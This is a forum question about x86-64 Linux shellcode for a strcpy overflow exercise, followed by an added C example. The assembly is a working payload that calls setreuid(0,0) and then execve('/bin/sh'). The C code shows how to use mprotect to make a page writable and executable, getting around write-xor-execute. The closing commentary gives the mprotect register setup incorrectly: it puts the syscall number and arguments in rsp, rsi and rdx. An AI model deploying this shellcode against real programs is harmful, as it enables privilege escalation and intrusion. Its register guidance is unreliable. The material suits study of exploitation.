How to write inside a string stored in the executable .text section of ASM code?


I'm trying to write a shellcode to play with a strcpy vulnerability, trying to understand a bit more about how that stuff works.

So far I've managed to inject a sort of "hello world" written in assembly into my vulnerable program, and I got that working.

Now I'm trying to get to the next step, which is to spawn a shell in my ASM code, rather than just printing a meme sentence.

I have the following ASM code, which is basically Linux example 3 from here, updated for my x86_64 machine:

          ;; ASM Hello World x86_64 Linux
          global _start
          section .text
  _start:

          ;; setreuid syscall
          xor rax, rax            ; rax = syscall id
          xor rdi, rdi            ; rdi is arg0. = 0 for root priv
          xor rsi, rsi            ; rsi is arg1. = 0 for root priv
          mov al, 113             ; setreuid is syscall 113
          syscall                 ; call setreuid to get root priv if possible

          jmp short ender
        
  payload:
        
          ;;  execve syscall

          pop rdx                 ; get the string address
          xor rax, rax
          mov [rdx+7], al         ; put a null where the N is
          mov [rdx+8], rdx        ; put the address of the string where AAAAAAAA is
          mov [rdx+16], rax       ; put a bunch of NULLs where the BBBBBBBB is
          mov rdi, rdx
          lea rsi, [rdx+8]
          lea rdx, [rdx+16]
          mov al, 59              ; execve is syscall 59
          syscall
        
  ender:
          call payload
          db '/bin/shNAAAAAAAABBBBBBBB'

As a first step I try to run this on its own, unrelated to the buffer overflow vulnerability in the C program. When I do so, I get a segfault at mov [rdx+7], al.

I'm thinking this might be because of the Write XOR Execute security mechanism, which prevents me from writing over executable memory, but since I'm definitely a beginner here, can someone confirm that's what's happening, as opposed to the code being wrong?

If indeed I am blocked by the security mechanism, can I bypass that with a call to mprotect to set my memory page as writeable AND executable?

From the mprotect documentation, I understand I need to provide the first address of my memory page; could I get some help on how to get this value in my asm code?

I did see this other question that seems highly related and might confirm the write/exec mechanism is my first problem. It also contains a call to mprotect, but if I understand correctly they use a hardcoded value of 0xff for the address of their memory page, which I don't understand.

Thanks a lot, o7


There are 0 answers
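The following is an added C example, not code from the question or from the tutorial it adapts. It reproduces the fault the question describes and shows the mprotect fix and the page-address arithmetic the asker is looking for. The string template is placed in .rodata (via a const array) rather than .text, because C gives no clean way to put data in .text; both sections are mapped without PROT_WRITE, so the fault and the fix are identical. The names template_str, page_base, protect_range, store_faults_when_readonly and patch_after_mprotect are made up for this example.

```c
/* Added example: why a store into the page holding the shellcode faults, and
 * how mprotect() lifts the restriction. Linux, x86-64, gcc or clang. */
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/* mprotect() requires a page-aligned start address: clear the low bits.
 * No hardcoded page address is needed; any address inside the page will do. */
uintptr_t page_base(uintptr_t addr, size_t page_size) {
    return addr & ~((uintptr_t)page_size - 1);
}

/* Change the protection of every page overlapping [addr, addr+len).
 * Returns 0 on success, -1 on failure (errno set by mprotect). */
int protect_range(const void *addr, size_t len, int prot) {
    long ps = sysconf(_SC_PAGESIZE);
    if (ps <= 0) return -1;
    uintptr_t start = page_base((uintptr_t)addr, (size_t)ps);
    uintptr_t end = page_base((uintptr_t)addr + len + (uintptr_t)ps - 1, (size_t)ps);
    return mprotect((void *)start, end - start, prot);
}

/* Constructed stand-in for the db '/bin/shNAAAAAAAABBBBBBBB' in the question.
 * A const array lands in .rodata, which like .text is mapped without PROT_WRITE. */
static const char template_str[] = "/bin/shNAAAAAAAABBBBBBBB";

/* Hand out a pointer the compiler cannot see through, so it does not
 * constant-fold reads of a "const" object we are about to modify. */
static char *template_ptr(void) {
    char *s = (char *)template_str;
    __asm__ __volatile__("" : "+r"(s) : : "memory");
    return s;
}

/* Does the shellcode's first store (the NUL at offset 7) fault when the page is
 * read-only? Done in a forked child so the parent survives the SIGSEGV.
 * Returns 1 if the child died with SIGSEGV, 0 otherwise. */
int store_faults_when_readonly(void) {
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) {
        char *s = template_ptr();
        protect_range(s, sizeof template_str, PROT_READ); /* make sure it is read-only */
        s[7] = '\0';                                      /* mov [rdx+7], al */
        _exit(0);                                         /* only reached if no fault */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return 0;
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV;
}

/* The same three stores as the shellcode, after making the page writable.
 * Returns 1 if they succeeded and left "/bin/sh" followed by argv = {s, NULL}. */
int patch_after_mprotect(void) {
    char *s = template_ptr();
    /* PROT_EXEC is kept because the real shellcode executes from this same page. */
    if (protect_range(s, sizeof template_str, PROT_READ | PROT_WRITE | PROT_EXEC) != 0)
        return 0;
    char *argv0 = s;
    s[7] = '\0';                           /* mov [rdx+7], al   */
    memcpy(s + 8, &argv0, sizeof argv0);   /* mov [rdx+8], rdx  */
    memset(s + 16, 0, sizeof(char *));     /* mov [rdx+16], rax */
    char *argv0_back = NULL, *argv1_back = NULL;
    memcpy(&argv0_back, s + 8, sizeof argv0_back);
    memcpy(&argv1_back, s + 16, sizeof argv1_back);
    return strcmp(s, "/bin/sh") == 0 && argv0_back == s && argv1_back == NULL;
}

int main(void) {
    printf("store faults while page is read-only: %d\n", store_faults_when_readonly());
    printf("stores succeed after mprotect(RWX):    %d\n", patch_after_mprotect());
    return 0;
}
```

In the shellcode itself the equivalent of page_base is the address already in rdx after the pop, with its low 12 bits cleared (and rsp, rsi, rdx set to length, protection and the mprotect syscall number, 10 on x86-64). Two caveats a practitioner would weigh: a hardened kernel or SELinux policy can refuse PROT_WRITE|PROT_EXEC mappings entirely, and the extra syscall costs bytes and adds NUL bytes to avoid. The usual answer is to not write into the code page at all, but to build "/bin/sh" and the argv array on the stack with push instructions, which is writable by design.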